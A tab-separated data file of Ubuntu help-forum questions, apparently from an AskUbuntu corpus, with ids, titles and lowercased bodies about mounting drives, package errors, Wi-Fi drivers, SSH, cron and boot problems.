299114	how to read a hfs+ journaled ?	i'v got a mac of a friend here , and the hard disk is broken , wich ca n't be repaired ! now i installed ubuntu on the machine and tried to mount the hfs+ partition to 'save ' all possible data . unfortunately i ca n't mount the hard disk as read/write only as read . that means that i ca n't copy the files from /users/hanna because i do n't have the permission for that folder ! i tried all kinds of techniques and tricks etc . but still ca n't mount it as read/write or open the /users/hanna folder .
299115	batch launchpadlib api queries together	i want to get information about all the ubuntu bugs filed till date . so i used the launchpadlib api to get all of them using the id . i start a loop at id 1 and continue . but this is a very slow process . it takes a lot of time . i was wondering if there was a way to speed up the process . get 100 or 500 bugs together at a time . this would speed up my program considerably . any help would be useful . thanks
299116	ubuntu automatically logs out as the software center is opened	i have a really weird problem ... once i open the software center , my machine ( using ubuntu 13.04 ) logs out after ~ 8 sec ... but if i minimized the software center , nothing happens ... after i maximize it , the counter starts again and after ~ 8 sec the machine logs out again ... i noticed that minimizing resets the counter please help because its really annoying not to be able to install apps from the software center without minimizing it every 3~4 seconds
299117	how to disable two-fingers/right-click in touchpad ?	i would like to disable the function right-click when tapping the touchpad with two fingers , because it is always interfering with the two-fingers/scrolling function . i also would like to maintain the function left-click when double tapping with one finger . thanks for the help .
299118	how can i save an open text file in a gui console from a text console ?	i 'm running the latest desktop ubuntu , and my system seems to have frozen -- the pointer moves when i move the mouse , but nothing else is happening ; even the clock is stopped . tty1-6 work just fine , though ; it 's just the gui . normally i 'd just restart , but i have an open file in gedit with a lot of unsaved changes -- inexplicably , the auto-save has n't worked for ages . is there a way to go into another console , log in with the same account , and access processes in a gui console , either to just send a `` save '' command or just retrieve the open file text ? eta : i know how to get the process id with lsof and have done so . i suspect there may be something i can do with disown or the like .
299120	how to set default wallpaper as login screen wallpaper [ automatically ] ?	i`m unable to set the login screen wallpaper of my custom wallpaper is there any working tool which changes easily without any bugs
299123	dconf usage in shell scripts for gvariant	i get an error when using `` dconf write '' to value a key with a [ ] list from a bash shell script the script below works as expected : # ! /bin/bash echo `` dconf write < path > \ '' [ 'val1 ' , 'val2 ' ] \ '' '' dconf write < path > `` [ 'val1 ' , 'val2 ' ] '' dconf read < path > echo ok the script below fails with `` error : 0-9 : unterminated string constant '' # ! /bin/bash list= '' \ '' [ 'val1 ' , 'val2 ' ] \ '' '' echo dconf write < path > $ list dconf write < path > $ list # fail dconf read < path > echo nok any idea ?
299125	background color of kate 's search/replace input fields	i 'm using kate on my ubuntu 13.04 unity without any problems . even the dark mediterranean-themes ( http : //gnome-look.org/content/show.php/ ? content=156782 ) look great inside kate . as you may see in the screenshots , this is a theme with dark background and bright foreground ( some greyish-white ) . if i now start search/replace inside kate , the input text field has a dark background and bright foreground as expected from the theme . depending on the matches , kate changes the background on-the-fly to some light green or light red , without altering the foreground color . this makes reading extremely difficult . is there a way to adjust the foreground color or disable this behavior ? i already searched fonts & colors inside the configuration , but this menu entry seems to be restricted to the editor only . any ideas ?
299127	why do i have so many .xauthority . * files in my home directory ?	i 'm using ubuntu 13.04 on a lenovo x220 . why do i have so many .xauthority . * files in my home directory ? i.e .xauthority .xauthority.0jw6uw .xauthority.2hwrvw .xauthority.2ta6vw .xauthority.49f8vw .xauthority.4e27uw .xauthority.7cltvw .xauthority.8jggxw .xauthority.96savw .xauthority.aoufvw .xauthority.asdovw .xauthority.cgvjxw .xauthority.e0zsvw .xauthority.e5vzww .xauthority.fe64uw .xauthority.fihdww .xauthority.hl45vw .xauthority.hyccvw .xauthority.ilueww .xauthority.jxjhvw .xauthority.k1qjxw .xauthority.kxsovw .xauthority.lekevw .xauthority.m48wvw .xauthority.m6qtvw .xauthority.mw6nww .xauthority.n57tww .xauthority.o5haww .xauthority.oic5vw .xauthority.p2rpvw .xauthority.q0frvw .xauthority.qw01ww .xauthority.rdw5ww .xauthority.t0tlww .xauthority.tso4ww .xauthority.u6r9vw .xauthority.v3kaww .xauthority.w8z1ww .xauthority.xdlgvw .xauthority.xoohww.xauthority.xuicvw they are all zero bytes except the first , with timestamps all over the place . what are these , and are they safe to delete ?
299128	reconnecting to drobo over iscsi after server reboot	i have an iscsi attached drobo hooked up to a server that i use to put backups on . i connect to the drobo using a command like : sudo iscsiadm -m node -- login then i find what device is new in /dev ussually sda1 and mount it using : mount /dev/sda1 /drobo i would like to automate this everytime the system reboots . although the drobo ussually shows up as sda1 this is not always the case . is there a way i can absolutely determine what device is the drobo after running the iscsi login command .
299129	ssh connection refused when connecting remotly	i set up my ubuntu server and it can connect to itself when running ssh localhost . however , when i run putty on windows 8 i get a `` connection refused '' error . i have , to the best of my ability : disabled the firewall double checked port number in putty allowed putty in my windows firewall ( i can connect to other servers fine ) reinstalled ssh when trying to connect with putty i am using 127.0.0.1 and port 22 ( i did not change the port number on my server from default ) . i think the problem is that the server is n't allowing external devices to connect to it still but if it is n't the firewall then i 'm not quite sure where to look , i 'm not the linux guru i wish i was but i know enough to get by with most things . additionally , i realize there have been many posts on this connection refused error , however i just spent all day reading through them and i could n't find anything that looked relevant to the issues i am experiencing
299131	hard drive location keeps changing after upgrade to 13.04	after i upgraded to 13.04 the hard drive media location keeps changing . these are installed hard drives not removable media . this issue does not seem to affect usability via the file managers ( nautilus and dolphin ) but it does affect symlinks . in the following 'disk ' represents the disk name and 'home ' is my home directory name . on one boot the media location is '/media/disk/ ' on another it 's 'media/home/disk/ ' . there 's no pattern that i 've found so far as to when its one way or the other . the symlinks are written differently pending the mounting location . some point to one location and other point to the other location . their usability changes on rebooting where the ones that worked break and vise versa . for example after i boot if i mount another drive it sometimes mounts at 'media/home/disk/ ' . if i mount another it mounts at 'media/disk/ ' . if i unmount the first that was at 'media/home/disk/ ' and remount that very same drive , it mounts at 'media/disk/ ' . i was under the impression that internal hard drives ate supposed to be mounted at 'media/disk/ ' and removable media and disks at 'media/home/disk/ ' . please correct me if i 'm wrong . so ultimately it seems that the underlying problem is where the drives are getting mounted . then the question is where are they supposed to be mounted and why dose n't the system consistently mount them there ? i had a similar issue on upgrading to 12.10 but that seemed to be a bug and was resolved quickly . is this a bug or is it something i can fix permanently ? thanks .
299137	how to downgrade from libreoffice 4.0 to 3.6 ?	how to `` properly '' downgrade libreoffice versions deals with a downgrade from 3.5 to 3.4.* . is there any way to nicely downgrade libreoffice 4.0 to 3.6 ? the latter is not in the package lists . background : it is because of this bug which is about the incompatibility of an extension which should really be core functionality . essentially , 4.0 just does not deal with templates in an intelligent way . you can not fully apply a template to an existing document . update : based on apt-cache showpkg libreoffice ( found on how to downgrade a package via apt-get ? ) one can confirm that only libreoffice 4 . * is in the repositories .
299138	networkmanager tries to connect to random wireless networks that it has n't used before	if networkmanager ca n't connect to one of the networks that i 've set up for automatic connections , it will start what appears to me to be randomly picking nearby networks and trying to connect to them . after i tell it to forget all the networks it tried and failed to connect to , it will still try to connect to random networks . i 've checked in /etc/networkmanager/system-connections/ and there are no networks listed that i do n't actually want . does anyone know how to fix this ?
299139	how to connect acer e330 glow to ubuntu 13.04 in mtp mode ?	well the title is quite clear i guess . how can i connect my acer e330 liquid glow to ubuntu 13.04 through the usb-cable ? it works just fine ptp-mode ( camera ) but not in mtp-mode ( media ) . my phone works on android 4.0 . i already tried a bunch of stuff but it did n't work ... thanks
299143	why do my clementine icons look like gnome default ?	i am talking about the icons inside clementine , not the indicator icons or unity launcher icons . i mean the ones almost on the bottom of the screen previous track , play , pause , next track . after i installed ubuntu 13.04 and clementine fresh it looked like it should : black and white icons in black circles . ( i 'd love to upload a picture but as this is my first question , it seems that i ca n't because i need 10 rep points to do so ) now , ( i think after i added the cinnamon-stable repo , but i 'm not entirely sure ) those icons look like some kind of gnome default , an ugly stale grey . can anybody tell me why that is and more importantly , how i can get it right again ? i figured it might have something to do with qt style settings in my unity environemt . am i thinking in the right direction ? i know it 's a minor thing but it drives me nuts . thanks !
299152	how to resolve that error when i try to install build-essential ?	i ca n't install build-essential on my laptop : it shows error : the following packages have unmet dependencies : build-essential : depends : g++ ( > = 4:4.4.3 ) but it is not going to be installed depends : dpkg-dev ( > = 1.13.5 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
299153	ca n't change brightness : fujitsu amilo li3710 & ubuntu 13.04	i ca n't change the screen brightness on my fujitsu amilo li3710 . pressing the keys ( fn+brightness up ) or sliding the bar in brightness & lock has no effect . it worked on windows so the function is supported by the hardware . thanks for your help .
299155	12.04 continuously offering partial upgrade	i have ubuntu 12.04 with unity ( to be precise i 've upgraded a year ago ) and for the last 3 months or so it 's been offering me a partial upgrade . the only things that can not be upgraded are the kernel and dropbox . i 'm still on the 3.2.0-37-generic-pae kernel . on my another machine ( 12.04 with mate ) i had the same problem but it disappeared on its own . what should i do to go on with normal life ?
299163	how to transfer pdf file to ipad 4 ?	i was able to transfer music by installing few libraries and then my device was recognised by rhythmbox . but no success in transferring pdf files to ipad . any suggestions ? ? thanks in advance .
299166	ati video drivers issue	i recently installed ubuntu 13.04 i have a radeon hd6470m and another intel integrated graphics card . under 'additional drivers ' it says im using an open source driver for the radeon hd 6400m/7400m series but when i look at the system details it says intel速 sandybridge mobile x86/mmx/sse2 under graphics . i have try 'd to install the driver from amd 's site but that totally went wrong so i uninstalled it . i am new to linux and ubuntu , does anyone know how i could fix this or find information ?
299168	how to update kingsoft office ?	i 've installed the previous beta version and would like to upgrade to the new version ( as announced on omgubuntu ) . when i try doing so via the software center i get a message that a certain package already exists ( see hereunder ) and can not be overwritten . i thus wanted to de-install the previous package but the software center does n't even mention kingsoft as being installed . now what ? unpacking kingsoft-office ( from ... /kingsoft-office_9.1.0.4032~a10_i386.deb ) ... dpkg : error processing /home/kcosyns/downloads/kingsoft-office_9.1.0.4032~a10_i386.deb ( -- install ) : trying to overwrite '/usr/bin/wps ' , which is also in package wps-office 8.1.0.3724~b1p2 dpkg-deb ( subprocess ) : failed in write on buffer copy for failed to write to pipe in copy : broken pipe dpkg-deb : error : subprocess paste returned error exit status 2
299174	how to download mp3s from amazon cloud player , banshee and raring ringtail	there are a few questions relating to this , many of which have answers , but all are dated and not working for me . i am trying to download my purchased music from amazon , but am running into the classic `` linux can only download one file at a time '' issue . i tried the usual tricks of installing a user agent plugin for firefox , as well as trying to launch from banshee , but it does n't work . at this point , i get to the `` download cloud player '' link on amazon , and when i click `` already installed ? launch now '' i get directed to the url amazoncloudplayer : //launch which firefox says it has no registered applications for that protocol . i wonder if this can be fixed by registering banshee or something else with that protocol , but i ca n't seem to figure out how to make it work . any ideas ?
299175	what do i do when ubuntu 12.10 freezes while starting up ?	i have installed ubuntu to dual boot on my mac with mountain lion , but whenever i decide to boot ubuntu i can make it all the way to the log in menu but when i log in it will freeze up . i am not sure if it is the hardware of my computer at this point or if it is some other glitch .
299176	how do i get libreoffice back to normal ? ( 13.04 )	on opening libreoffice recently , it 's been looking like this , like something from windows 98 : it 's similar to this on all libreoffice applications . it 's not purely aesthetic either , they also all run really slow . i 've tried reinstalling libreoffice & nautilus but now i do n't know what to do . any help really appreciated .
299178	ubuntu phone problem !	i tried to install ubuntu phone on my galaxy nexus , but during the process the pc crashed . when i tried to boot up the phone again it shows the google-sign , and then it turns black : ( i have tried to go to recovery mode , and followed the steps on how to install ubuntu phone manually , but i do n't have an sd-card . is it possible to use the abd sidelode ? i have tried to write : adb sideload < ubuntu.zip > but i only get the message : bash : ubuntu.zip ( filename ) : no such a file or directory what am i supposed to do now ? is my phone totaly `` dead '' ? please help ! i know i am doing this at my own risk ...
299183	extenar display not detected correctly in dell latitude e6530	currently , i bought the laptop dell latitude e6530 and installed ubuntu 13.04 64 bit ( raring ringtail ) alongside with windows 7 ( i could not get rid of it because of some special programs for work ) . ubuntu worked well . however , it did not detect the external displays ( dell 23 '' and dell 19 '' ) no matter if i plugged them in before or after booting . i connected my laptop to those external displays through a laptop dock . i went to settings - > display . the displays were there , but when i enabled them , ubuntu logged off automatically . no external display was detected . in addition , the laptop screen sometimes was detected as dell 23 '' . i got advice from similar topic that the nvidia driver should be updated to version 313 or 319 . i upgraded the driver and the unity launcher disappeared , main display resolution turned to 640*480 and none of the external displays were detected . i tried to use additional drivers , but when i turned it on , it told me that there was no driver to be used . what should i do ? i have set options vmwgfx enable_fbdev=1 .
299184	fonts corrupted , all look the same	after i upgraded to ubuntu 13.04 i have a problem with the fonts in some apps . when i use gvim or fontconfig , all the fonts available look the same . it does n't matter which one i chose , it always defaults to the same ugly default . when i try to choose a different font in gnome-terminal preferences , it crashes . font usage in libreoffice is fine . i have removed all the files in /var/cache/fontconfig . i issued fc-cache -r. i removed ~/.fonts directory . i uninstalled and reinstalled all the ttf-* packages and some more . what else can i try ?
299187	ubuntu cloud service and carotdav	i am trying to connect to ubuntu cloud service one.ubuntu.com with 3th client carotdav . on windows7 home , 64 bit . ( limited user , non-administrator ) does it possible ? in theory yes , but in reality i need your help ... carotdav says : rei.fs.simplewebexception : the remote server returned an error : ( 403 ) forbidden . at rei.fs.webdav.webdavfs.getresponse ( httpwebrequest request , boolean notreqstream ) at rei.fs.webdav.webdavfs.innergetinfo ( uri target , depthtype depth ) at rei.fs.webdav.webdavfs.getinfoandentries ( uri targeturi ) at carotdav.cachemanager.getinfoandentries ( fsbase fs , uri targeturi , boolean enablecache ) at carotdav.mainform.fs_getinfoandinnerentries ( uri uri , resourceid id , resourceid parentid , boolean enablecache ) thanks .
299192	wireless is not wokring after a fresh install of ubuntu 13.04 on vostro 3400	i have done a fresh installation of ubuntu 13.04 64-bit recently on my dell vostro 3400.but sadly my wi-fi is not working at all now . it can detects the network but it does n't connect to it at all . before that it used to work fine in ubuntu 12.10 . i have tried almost all the answers given by people on the forum for this problem but could not resolve my problem . here is output i get from the command lspci - nn 00:00.0 host bridge [ 0600 ] : intel corporation core processor dram controller [ 8086:0044 ] ( rev 18 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation core processor integrated graphics controller [ 8086:0046 ] ( rev 18 ) 00:16.0 communication controller [ 0780 ] : intel corporation 5 series/3400 series chipset heci controller [ 8086:3b64 ] ( rev 06 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 5 series/3400 series chipset usb2 enhanced host controller [ 8086:3b3c ] ( rev 06 ) 00:1b.0 audio device [ 0403 ] : intel corporation 5 series/3400 series chipset high definition audio [ 8086:3b56 ] ( rev 06 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 1 [ 8086:3b42 ] ( rev 06 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 2 [ 8086:3b44 ] ( rev 06 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 3 [ 8086:3b46 ] ( rev 06 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 5 [ 8086:3b4a ] ( rev 06 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 5 series/3400 series chipset usb2 enhanced host controller [ 8086:3b34 ] ( rev 06 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev a6 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation mobile 5 series chipset lpc interface controller [ 8086:3b0b ] ( rev 06 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 5 series/3400 series chipset 6 port sata ahci controller [ 8086:3b2f ] ( rev 06 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 5 series/3400 series chipset smbus controller [ 8086:3b30 ] ( rev 06 ) 00:1f.6 signal processing controller [ 1180 ] : intel corporation 5 series/3400 series chipset thermal subsystem [ 8086:3b32 ] ( rev 06 ) **12:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) ** 13:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 ) ff:00.0 host bridge [ 0600 ] : intel corporation core processor quickpath architecture generic non-core registers [ 8086:2c62 ] ( rev 05 ) ff:00.1 host bridge [ 0600 ] : intel corporation core processor quickpath architecture system address decoder [ 8086:2d01 ] ( rev 05 ) ff:02.0 host bridge [ 0600 ] : intel corporation core processor qpi link 0 [ 8086:2d10 ] ( rev 05 ) ff:02.1 host bridge [ 0600 ] : intel corporation core processor qpi physical 0 [ 8086:2d11 ] ( rev 05 ) ff:02.2 host bridge [ 0600 ] : intel corporation core processor reserved [ 8086:2d12 ] ( rev 05 ) ff:02.3 host bridge [ 0600 ] : intel corporation core processor reserved [ 8086:2d13 ] ( rev 05 ) please suggest me some solutions for it . in addition to this problem my system freezes a lot , i do n't know the exact problem for it . in older version of ubuntu i have never faced this problem .
299198	force upgrade 12.10 to 13.04	i have ubuntu 12.10 installed and until a few weeks back it used to remind me to do an upgrade to 13.04 but at that time i was not interested . now that i want to upgrade i do n't know how to do that.i tried update manager in the dashboard but it says all software is updated . how do i force the upgrade ?
299200	cant update to 12.04	i installed ubuntu 10.10 recently . and when i am going to update it to 11.04 its giving me some errors . a problem occurred during the update . this is usually some sort of network problem , please check your network connection and retry . w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/source/sources.gz 404 not found w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/binary-i386/packages.gz 404 not found e : some index files failed to download , they have been ignored , or old ones used instead . there is no issue in my internet connection . plz help me to update .
299204	kdbg on ubuntu 10.04 lts	i wanted a good debugger gui for gdb and found that kdbg is the best one . when i tried searching for it in synaptic package manager i could not found it , then after a bit of googling found out that it was discontinued by ubuntu guys . got a link here pointing to this repo but could not find it there also . so my question is that is there a way i can download and install kdbg on ubuntu 10.04 or is there a better and newer alternative to it ? any suggestions are appreciated . thanks
299205	informations regarding installing ubuntu os	suppose i downloaded ubuntu 13.04 , then please tell : how can i make a bootable usb or cd and from which software ? how can i run .exe files on ubuntu ? will .exe file really work in ubuntu ? what about the antivirus programs that work on ubuntu ? is ubuntu and linux the same os ? will application like real player , vlc which are of .exe extension work on ubuntu ? please answer my every question , i 'm eager to know !
299208	ca n't see vpn option when configuring with network manager ( new install of ubuntu 13.04 )	i have recently completed a full install of ubuntu 13.04 after using 12.04 previously . i then tried to reinstall my vpn settings and am no longer able to configure a vpn using network manager . when i choose `` vpn connections '' -- > `` configure vpn '' i only have wired and wireless options ; nothing for vpn . i have already reinstalled network-manaager and network-manager-openvpn through synatic but to no avail . any suggestions on how to resolve this would be appreciated and save me from having to revert back to 12.04 . thanks ! paul
299216	hud , zeitgiest and the record activity toggle	i am using ubuntu 12 lts . i was wondering if turning off the record activity toggle under the privacy menu effected the performance of the hud ? also , does doe hud use zeitgiest ? does the record activity toggle record to the zeitgiest file ? thanks
299218	compiled executable can not run	cpp program . but now i can not run it . it show that command not found . i compile it by ; gcc `pkg-config -- cflags opencv` opencv_violajones.cpp -o opencv_violajones `pkg-config -- libs opencv` it 's compiled successfully . however , when i run it : ./opencv_violajones it shows me `` command not found '' . i am pretty sure that i am in the same directory and use correct name . could you explain this to me , please ? thank you very much !
299229	installing openjdk-6-jre : i386 on ubuntu 12.04 64 bit : broken dependencies	i wa strying to install openjdk-7-jre : i386 in order to access to the university 's vpn . i 've a machine with ubuntu 12.04 lts ( precise ) 64 bit . however , when i try to install openjdk-6-jre : i386 , sudo apt-get install openjdk-6-jre : i386 i end up with this error : lettura elenco dei pacchetti ... fatto generazione albero delle dipendenze lettura informazioni sullo stato ... fatto alcuni pacchetti non possono essere installati . questo puă˛ voler dire che ă¨ stata richiesta una situazione impossibile oppure , se si sta usando una distribuzione in sviluppo , che alcuni pacchetti richiesti non sono ancora stati creati o sono stati rimossi da incoming . le seguenti informazioni possono aiutare a risolvere la situazione : i seguenti pacchetti hanno dipendenze non soddisfatte : openjdk-6-jre : i386 : dipende : libatk-wrapper-java-jni : i386 ( > = 0.30.4-0ubuntu2 ) ma non sta per essere installato e : impossibile correggere i problemi , ci sono pacchetti danneggiati bloccati . which basically says that there are some packages that have unsatisfied dependencies : the following packages have unsatisfied dependencies : openjdk-6-jre : i386 : dipends on : libatk-wrapper-java-jni : i386 but it can not be installed e : impossible to correct problems , there are damaged bloked packages . any hint on how to solve this ? thanks .
299232	accidentally ran `` sudo chmod a+rx ~ ''	i accidentally ran sudo chmod a+rx ~ on the system root rather than sudo chmod a+rx myfolder ... i ran sudo chmod -r a+rx myfolder/public_html then accidentally ran sudo chmod a+rx ~ instead of sudo chmod a+rx myfolder this quote is from a site i was using as a guide ... '' the first command sets everything in your public_html directory to be readable and accessible by all users on the system . the second command sets your home directory to be the same way ( though not all the files in it , like we did with public_html ) . note that the `` x '' in the first command is capitalized . '' in short , i 'm not a permissions guru and have many users on our cloud server . i would like to set it back to something more secure so that our main ssh users are fine , but any ftp user wo n't exploit my terrible mistake . pardon my ignorance !
299233	installing ubuntu onto macbook pro via usb	i am new to this forum , and to ubuntu . but i am trying to get it installed onto my macbook pro ( late 2009 - with an installed samsung ssd ) . i have attempted to follow the tutorial on the ubuntu website : www.ubuntu.com - how to create a bootable usb stick on os x but it does n't seem to work . i have refit installed as well . i have partitioned my ssd into my main one ( macintosh hd ) , and a new one ( ~30gb , ubuntu ) . i then followed the tutorial through , but it still does n't seem to work . i have a few questions ( parts i might have messed up on ) : i downloaded ubuntu 13.04 , 64 bit . is this ok ? on step 3 , i renamed the new image so that it ended in `` .img '' instead of `` .dmg '' , which it converted to . i did this because the rest of the tutorial referred to a file ending in `` .img '' . was this what i was supposed to do ? when i rebooted and held down the alt key nothing but the refit drive ( and the mac recovery drive came up . no ubuntu drive ( partition ) , and no usb drive , is this supposed to happen ? however , when i booted into refit , the usb drive came up , and when i ran it , it came up with a sort of purple screen the a keyboard and accessibility icon in the bottom center of the screen , after this however , it goes black ( screen does not turn off ) . ( 4 . if i ever do get it installed , will i have to install any drivers for either my mac harware or my ssd ? ) i am currently on mountain lion . the reason why i am using a usb drive is because my macbook pro keep spitting out anything ( except films ... really odd ) that i put into it . it rejected the windows installation disk ( which i put into test ) , and it rejected all cds and dvds which i attempted to burn ubuntu onto .
299237	dpkg error when installing linux	after running : sudo apt-get -f install or sudo apt-get install linux this error appears : dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux : linux depends on linux-generic ; however : package linux-generic is not configured yet . dpkg : error processing linux ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.8.0-19-generic linux-image-3.8.0-21-generic linux-image-extra-3.8.0-19-generic linux-image-extra-3.8.0-21-generic linux-image-generic linux-generic linux e : sub-process /usr/bin/dpkg returned an error code ( 1 ) os : ubuntu 13.04 64-bit
299238	ethernet not detected whatsoever	i recently installed lubuntu 13.04 64-bit on one of my older computers ( the computer is ancient - ddr1 , no usb boot , yet it 's 64-bit . go figure . ) anyway , the wi-fi adapter i tried to use malfunctioned very quickly , and , after a bit of troubleshooting , i gave up ( for the time being . ) i decided to try and get the built-in ethernet working . the lubuntu box is wired via ethernet to a computer running windows xp , which is connected to wi-fi and is set to share it . trouble is , windows says the ethernet cable is unplugged , and the computer running lubuntu is entirely oblivious to the existence of its ethernet port . lspci | grep -i eth returns absolutely nothing , so i ca n't even put the correct firmware on a usb stick and install it that way . what 's wrong ? i will provide any computer/os/bios/etc details requested . update : found out why lubuntu was n't recognizing the ethernet - the bios had onboard lan disabled . i enabled it , but now the tray icon says `` ethernet - device not managed '' , and sudo ifup eth0 starts spamming a bunch of stuff about dhcp , and the command never finishes .
299241	how to reset kde / display settings after a move to a new machine	i 've recently upgraded my hardware to a new laptop , and installed the latest kubuntu build on the new machine . various advice here and elsewhere led me to hope that i could bring all of my kde settings over to the new machine by copying my home directory and .kde dir over to the new machine . i 've done that , but it comes up with a mostly blank garbled screen with blue gibberish along the bottom instead of the menu bar - basically unusable in the graphical interface . presumably this is because the old graphics settings are n't compatable with the new hardware ( the monitors are the same , but the new machine has a new graphics card . ) i can log in to a command-line tty at ctrl-alt-f1 . i 'm looking for how to reset the display settings without losing ( or with losing as little as possible of ) my other settings ; i imagine wiping my entire .kde directory would get me back , but i 'm hoping for something less drastic . any suggestions ?
299244	why i ca n't search from the dash on amazon anymore on 13.04 ?	i know a lot of people were not happy with the search functionality from amazon being added to ubuntu but i was really pleased with it till now -- it stopped working . since upgrading to 13.04 i am no longer able to search for products using the dash . did that feature get canned ?
299246	syncing problem	for about a fortnight , i have been failing in syncing my files . the error message i am getting says : giving up on request after 5 attempts , last status 400 bad request . please fix the problem if this is a program error or , tell me what i am doing wrong if it 's an error on my part .
299247	problems with usb mouse on 12.04 lts	my mouse stops working after a few seconds , or a few minutes at most . it works fine on my raspberry pi and on my mac , but my ubuntu 12.04 lts system complains : [ 654.508063 ] usb 2-5 : new low-speed usb device number 4 using ohci_hcd [ 654.712876 ] usb 2-5 : device descriptor read/all , error -71 when i unplug and re-plug the mouse , it will work for some more seconds . this is obviously not a solution . any ideas ?
299253	ubuntu 13.04 and steam	i am having a major issue with steam working on ubuntu . i previously had steam working on ubuntu 12.04lts but after upgrading to ubuntu 13.04 i have had issues . there are two issues , first sometimes that steam client just shuts down and is no responsive . the second and most troubling issue is the inability to use the steam store . i will click on the store tab a search for any game then after clicking on the game that i want steam kind of freezes . i mean freezes because the icon in the upper right corner next to the `` big picture '' button shows that steam is working . but after leaving this open for an hour or so there was no change . i have deleted and re-downloaded steam many times , check inter net connection , ect i am at a loss . if anyone could please help it would be much appreciated . thank you
299255	maintained upnp server on 13.04 ?	i 'm looking to create a upnp server on my 13.04 server installation . i 've done some searching and installing but nothing seems to fit the criteria for me . i 'm just wondering if there are any still maintained upnp servers for 13.04 ? i 've been playing with mediatomb , but it does n't organize my files correctly , even after linking to import scripts . furthermore , it does n't appear to be maintained anymore , as the most recent release is still from quite a while ago , though i may be wrong . ps3 media server does n't seem to work with a variety of devices either .
299256	sudo command not working in cron	i have a small script and i want to run it as user1 in cron . if i am logged in as user1 and execute the script it works just fine , but the moment i try to run it in cron it does not work . if i run the cron as root everything works . here is what i am doing script has below command sudo virsh list -- all | grep myvm | awk ' { print $ 3 } ' running so if i run it as user1 or put this into a file everything just works . but i add it as */5 * * * * user1 /path/to/script if i run as root in cron it works smooth without sudo * * * * * root /path/to/script my sudoers file cmnd_alias kvmcmd = /usr/bin/virsh list -- all % user1 all= ( root ) nopasswd : kvmcmd i directly cant blame sudoers as manually running the command works ( may be because of tty )
299259	ubuntu/lubuntu wi-fi stopped working after screen replacement/wi-fi disconnect	i changed the screen in my hp530 ( so much cheaper than a new laptop ) . i had to disconnect the wifi card in the process of opening the machine up . now i have an unusual problem ; the wifi works fine in vista but booting in lubuntu or ubuntu , i see very weak signals for available networks and connecting to mine does n't work anymore . it 's an intel 3945abg ( golan ) wi-fi card and lubuntu 12.10 . any ideas ?
299263	library package documentation	i 've seen in many packages like libutouch-geis that there is also another package with -doc suffix . is this package the documentation of the library ? is it possible to read it and if yes how ? if no , the only `` documentation '' for libraries like utouch is the header files ?
299266	does upgrading ubuntu risk the loss of important data ?	i currently use ubuntu 10.04 , and i want to upgrade it to version 12.04 ( and then , maybe , to 13.04 ) . i can do it via upgrade manager , but i 'm worried that my important files ( which are in the home folder ) could be removed . i also have many files ( circa 50 gb ) on another hard disk ( it 's a different disk than the one on which i have installed ubuntu ) - are they safe ? last but not least , i 've installed windows xp ( so i can choose my system via grub ) and i want to know whether it will be still there , or will it be removed ?
299276	deleted ubuntu partion , ca n't get boot menu up	i deleted my ubuntu partition by mistake and now i get this error : error : no such partition grub rescue > how do i get my boot options up again so i can load a live cd ? the partition it seems to recognize is ( hd0,6 ) but i have no way to boot !
299284	unattended-upgrade does not update security updates	i run unattended-upgrade with allowed-origins set to security and nothing listed in the blacklist . however when i run unattended-upgrade -d , the log lists a blacklist with all my security updates listed . no packages are updated . what could i be doing wrong ? any help would be appreciated .
299286	how to recover focus after losing it while using wine	sometimes when using wine , specially with games , doing alt+tab will make the system loose either keyboard or mouse focus over the current active window . with this i mean that for example , if i do alt+tab from the wine game to nautilus , empathy or another app and then try to go back to the game ( may need to do this several times , about 3 to 4 should be enough ) , it will stay in nautilus ( the active window ) or any other app , but the keyboard and mouse will be on the game . if i try to alt+tab my way back , the alt+tab functionality is lost ( can not use it until i forcibly close the wine game using for example wineserver -k on a terminal . so i will be left with a system that is showing me in foreground the nautilus app but the keyboard and mouse focus are on a minimized , background app ( wine game for example ) . so how can i either get the alt+tab back or be able to get focus on the current active window and be able to switch back and forth again . this can also happen to only one input , for example , the wine game might have the keyboard focused on it , but the mouse is not ( sometimes even lost and not usable until wine is closed ) .
299290	connect to a network using only keyboard	my mouse does not work right now , but still i would like to connect to the internet . normally i would click the network icon and choose the network , but how to get there without mouse ? i can go to `` network connections '' and modify the existing connections using the keyboard , but i can not actually say that i want to connect to one of the connections there . maybe there is a shell command ? i have 12.04 ( unity ) .
299291	how can ubuntu detect some mobile devices that debian does n't ?	for example , when i plug a samsung i770 in ubuntu and i run eclipse , the mobile device is detected and i can run my apps . but debian does n't recognise this device . what package is included in ubuntu that enables this ? libusb maybe ?
299293	how to `apt-get dist-upgrade` an asus eeepc 1005ha using ubuntu 10.04.4 lts netbook edition ?	i have a asus laptop with ubuntu can i upgrade to ubuntu 13.04 without deleting everything . and without using an iso .
299294	how do i give root privileges to an app ?	i tried to submit an app to the ubuntu software centre but it was rejected because you needed to put in the admin password to use it . i need to grant root privileges to the app for it to function so i used sudo . but they said i ca n't use sudo in my app . how can i give it root privileges ?
